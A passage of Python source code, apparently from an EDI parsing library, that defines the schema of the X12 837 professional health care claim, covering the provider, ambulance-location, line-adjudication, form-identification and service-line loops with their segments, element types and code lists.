), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="5250", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420D = Loop( "2420D", Properties( desc="Supervising Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420E = Loop( "2420E", Properties( desc="Ordering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ordering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DK"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ordering Provider Address", position="5140", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ordering Provider City, State, ZIP Code", position="5200", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Ordering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "PER", Properties( desc="Ordering Provider Contact Information", position="5300", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2420F = Loop( "2420F", Properties( desc="Referring Provider Name", looptype="", position="5000", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420G = Loop( "2420G", Properties( desc="Ambulance Pick-up Location", looptype="", position="5310", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2420H = Loop( "2420H", Properties( desc="Ambulance Drop-off Location", looptype="", position="5380", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2430 = Loop( "2430", Properties( desc="Line Adjudication Information", looptype="", position="5400", repeat="15", req_sit="S", ), Segment( "SVD", Properties( desc="Line Adjudication Information", position="5400", repeat="1", req_sit="R", syntax="", ), Element( "SVD01", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=1, codes=[], ), ), Element( "SVD02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="03", ), Element( "SVD03-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SVD03-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SVD03-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SVD03-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SVD03-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SVD03-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SVD03-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SVD03-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SVD04", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=4, codes=[], ), ), Element( "SVD05", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "SVD06", Properties( desc="Assigned Number", req_sit="S", data_type=("N0", "1", "6"), position=6, codes=[], ), ), ), Segment( "CAS", Properties( desc="Line Adjustment", position="5450", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "DTP", Properties( desc="Line Check or Remittance Date", position="5500", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="5505", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), ) parsed_837_2440 = Loop( "2440", Properties( desc="Form Identification Code", looptype="", position="5510", repeat=">1", req_sit="S", ), Segment( "LQ", Properties( desc="Form Identification Code", position="5510", repeat="1", req_sit="R", syntax="C0102", ), Element( "LQ01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["AS", "UT"], ), ), Element( "LQ02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=2, codes=[], ), ), ), Segment( "FRM", Properties( desc="Supporting Documentation", position="5520", repeat="99", req_sit="R", syntax="R02030405", ), Element( "FRM01", Properties( desc="Assigned Identification", req_sit="R", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "FRM02", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=2, codes=["N", "W", "Y"], ), ), Element( "FRM03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "FRM04", Properties( desc="Date", req_sit="S", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "FRM05", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), ), ) parsed_837_2400 = Loop( "2400", Properties( desc="Service Line Number", looptype="", position="3650", repeat="50", req_sit="R", ), Segment( "LX", Properties( desc="Service Line Number", position="3650", repeat="1", req_sit="R", syntax="", ), Element( "LX01", Properties( desc="Assigned Number", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[], ), ), ), Segment( "SV1", Properties( desc="Professional Service", position="3700", repeat="1", req_sit="R", syntax="P0304", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV101-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SV101-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV101-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV101-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV101-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV101-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV101-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV101-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "SV103", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["MJ", "UN"], ), ), Element( "SV104", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "SV105", Properties( desc="Facility Code Value", req_sit="S", data_type=("AN", "1", "2"), position=5, codes=[], ), ), Element( "SV106", Properties( desc="Service Type Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Composite( "C004", Properties( desc="Composite Diagnosis Code Pointer", refdes="", repeat="", req_sit="R", seq="07", ), Element( "SV107-01", Properties( desc="Diagnosis Code Pointer", req_sit="R", data_type=("N0", "1", "2"), position=0, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-02", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=1, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-03", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=2, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-04", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=3, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), ), Element( "SV108", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "SV109", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), Element( "SV110", Properties( desc="Multiple Procedure Code", req_sit="N", data_type=("ID", "1", "2"), position=10, codes=[], ), ), Element( "SV111", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=11, codes=["Y"], ), ), Element( "SV112", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), 